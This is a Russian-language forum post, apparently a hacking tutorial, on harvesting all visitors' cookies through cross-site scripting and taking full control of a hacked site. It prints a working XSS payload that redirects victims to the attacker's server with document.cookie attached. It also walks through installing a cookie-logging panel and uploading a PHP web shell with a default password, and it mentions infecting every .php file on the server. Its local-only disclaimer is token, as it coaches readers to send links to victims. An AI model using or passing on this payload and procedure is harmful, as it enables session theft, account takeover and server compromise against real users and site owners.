Получаем куки всех пользователей и полный контроль над сайтом.

ВНИМАНИЕ! АВТОР НЕ ПРИЗЫВАЕТ ПОВТОРЯТЬ ПОДОБНОЕ НА РЕАЛЬНЫХ САЙТАХ. ТОЛЬКО НА ЛОКАЛЬНОМ СЕРВЕРЕ, ИБО ЭТО СТАТЬЯ ТОЛЬКО ДЛЯ ОЗНАКОМЛЕНИЯ, И ЭТО УГОЛОВНО НАКАЗУЕМО.


Всем привет, сегодня я расскажу как получать все куки пользователей, зашешдших на ваш сайт( и полный контроль если вы взломали сайт.)
Нам понадобятся:
1) Мозги
2) Свой сайт или взломанный сайт лично вами (хацкеры ебать)

Приступим
Кидаем на сервер ниже файлы, их 4. Их надо слегка изменить в файле admin.php логин и пароль и в файле index.html на ваш сайт.
Дальше заходим в браузер и пишем: https://yoursite.ru/admin.php . Вот скрин входа в панельку :
Как ввели логин и пароль, заходим, в панельку:

Дальше делаем инъекцию на сайте посредством xss и вводим следующее:

<script>location.href='http://вашсайт/с.php?c='+escape(document.cookie)</script> </body>

PHP

<script>location.href='http://вашсайт/с.php?c='+escape(document.cookie)</script> </body>

и в принципе все. Кидаем жертве линк на свой сайт и чекаем панель, а если на взломанном сайте, то **** будут сами идти.
Вот скрин лога:

Ну а если вы взломали нн сайт, то заливаем шелл, в загрузках он так и называется shell.
Дальше вводим в браузере https://взломаныйсайт/shell.php и вводим пароль от шелла( по дефолту он admin)
Вот скрин входа в шелл:
Дальше просто развлекайтесь с сайтом, ибо шелл позволяет делать все что хотите, даже инфицировать все .php файлы на сервере.

Скрин шелла:




Вот ссылки на все файлы в статье, для удобства залил на яндекс диск и сендспейс

#АвторскаяСтатья